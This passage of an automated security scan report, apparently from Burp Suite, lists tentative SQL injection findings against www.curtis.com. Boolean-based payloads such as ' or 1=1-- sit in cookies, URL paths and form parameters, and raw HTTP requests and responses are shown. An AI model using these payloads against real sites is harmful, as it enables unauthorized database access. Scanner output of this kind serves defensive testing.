<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /scripts/DateRange/ipopeng.htm13057657'%20or%201%3d2--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>



<script type="text/javascript">

</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.34. http://www.curtis.com/scripts/carousel/getimages.cfm [CFID cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/scripts/carousel/getimages.cfm

Issue detail

The CFID cookie appears to be vulnerable to SQL injection attacks. The payloads 17874711%20or%201%3d1--%20 and 17874711%20or%201%3d2--%20 were each submitted in the CFID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=617584317874711%20or%201%3d1--%20; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slid
...[SNIP]...

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 21 Apr 2011 12:09:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=;expires=Wed, 21-Apr-2010 12:09:11 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=617584317874711%20or%201%3d2--%20; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slid
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:09:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6215435;path=/
Set-Cookie: CFTOKEN=62237604;path=/
Content-Type: text/html; charset=UTF-8

<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.35. http://www.curtis.com/scripts/carousel/getimages.cfm [CFTOKEN cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/scripts/carousel/getimages.cfm

Issue detail

The CFTOKEN cookie appears to be vulnerable to SQL injection attacks. The payloads 92379312%20or%201%3d1--%20 and 92379312%20or%201%3d2--%20 were each submitted in the CFTOKEN cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=3257569792379312%20or%201%3d1--%20; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slid
...[SNIP]...

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 21 Apr 2011 12:09:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFTOKEN=;expires=Wed, 21-Apr-2010 12:09:19 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=3257569792379312%20or%201%3d2--%20; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slid
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:09:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6215470;path=/
Set-Cookie: CFTOKEN=50468307;path=/
Content-Type: text/html; charset=UTF-8

<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.36. http://www.curtis.com/scripts/carousel/getimages.cfm [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/scripts/carousel/getimages.cfm

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 75027296'%20or%201%3d1--%20 and 75027296'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm75027296'%20or%201%3d1--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slid
...[SNIP]...

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:09:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysear
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm75027296'%20or%201%3d2--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slid
...[SNIP]...

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:09:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>



<script type="text/javascript">

</script>

<style type="text/css">

...[SNIP]...

1.37. http://www.curtis.com/scripts/carousel/getimages.cfm [doctype parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/scripts/carousel/getimages.cfm

Issue detail

The doctype parameter appears to be vulnerable to SQL injection attacks. The payloads 20635308'%20or%201%3d1--%20 and 20635308'%20or%201%3d2--%20 were each submitted in the doctype parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html20635308'%20or%201%3d1--%20&slide_links=no&slide_number_display=no&water_mark=no

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html20635308'%20or%201%3d2--%20&slide_links=no&slide_number_display=no&water_mark=no

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.38. http://www.curtis.com/scripts/carousel/getimages.cfm [first_last_buttons parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/scripts/carousel/getimages.cfm

Issue detail

The first_last_buttons parameter appears to be vulnerable to SQL injection attacks. The payloads 21178287'%20or%201%3d1--%20 and 21178287'%20or%201%3d2--%20 were each submitted in the first_last_buttons parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no21178287'%20or%201%3d1--%20&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&w
...[SNIP]...

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no21178287'%20or%201%3d2--%20&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&w
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.39. http://www.curtis.com/scripts/carousel/getimages.cfm [first_slide_is_intro parameter] previous next

Summary

